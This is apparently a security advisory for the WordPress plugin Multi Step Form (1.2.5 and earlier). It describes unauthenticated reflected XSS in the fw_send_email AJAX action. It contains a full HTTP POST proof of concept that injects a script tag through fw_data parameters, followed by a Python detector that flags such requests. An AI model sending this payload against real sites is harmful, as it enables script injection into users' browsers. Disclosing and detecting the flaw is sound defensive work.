Multi Step Form <= 1.2.5 – Multiple Unauthenticated Reflected XSS

Proof of Concept
The following parameters are vulnerable in the fw_send_data function:
fw_data[id][1]
fw_data[id][2]
fw_data[id][3]
fw_data[id][4]
email
 
Proof of Concept (PoC):
The following POST request causes an alert to be displayed in the browser when it runs:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/2018/07/10/hola-mundo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 207
Cookie: wp-settings-time-1=1531401661
Connection: close

action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0
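
A defensive check for this request shape, as an added example that is not part of the original advisory or the plugin's code: it parses a form-encoded body sent to the fw_send_email action and reports the listed parameters whose decoded values contain HTML metacharacters. The function names and the two extra sample bodies are assumptions constructed for illustration; POC_BODY is the request body shown above.

```python
import re
from urllib.parse import parse_qsl, unquote

# Parameters the advisory lists as reflected: nested fw_data[...] fields and email.
WATCHED = re.compile(r"^(?:fw_data\[.*\]|email)$")
# Characters that let a reflected value leave HTML text or a double-quoted attribute.
# Assumption: single quotes are left out to avoid flagging names such as O'Brien.
HTML_META = re.compile(r'[<>"]')


def decode_fully(value, rounds=3):
    """Undo extra layers of percent-encoding (bounded) so %253C is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_fields(body, action="fw_send_email"):
    """Return [(param, decoded_value)] for watched fields carrying HTML metacharacters."""
    pairs = parse_qsl(body, keep_blank_values=True)
    if dict(pairs).get("action") != action:
        return []  # not a request to the affected AJAX action
    hits = []
    for name, value in pairs:
        value = decode_fully(value)
        if WATCHED.match(name) and HTML_META.search(value):
            hits.append((name, value))
    return hits


# Request body from the proof of concept on this page.
POC_BODY = (
    "action=fw_send_email&id=1"
    "&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
    "&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com"
    "&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0"
)
# Constructed samples: an ordinary submission and a double-encoded email value.
BENIGN_BODY = "action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=Ana&email=a%40example.com"
DOUBLE_ENCODED = "action=fw_send_email&email=%253Cb%253E"

if __name__ == "__main__":
    for label, body in [("poc", POC_BODY), ("benign", BENIGN_BODY), ("double", DOUBLE_ENCODED)]:
        print(label, suspicious_fields(body))
```

This flags requests for log review or a request filter; it does not replace escaping the values where the plugin writes them into the response.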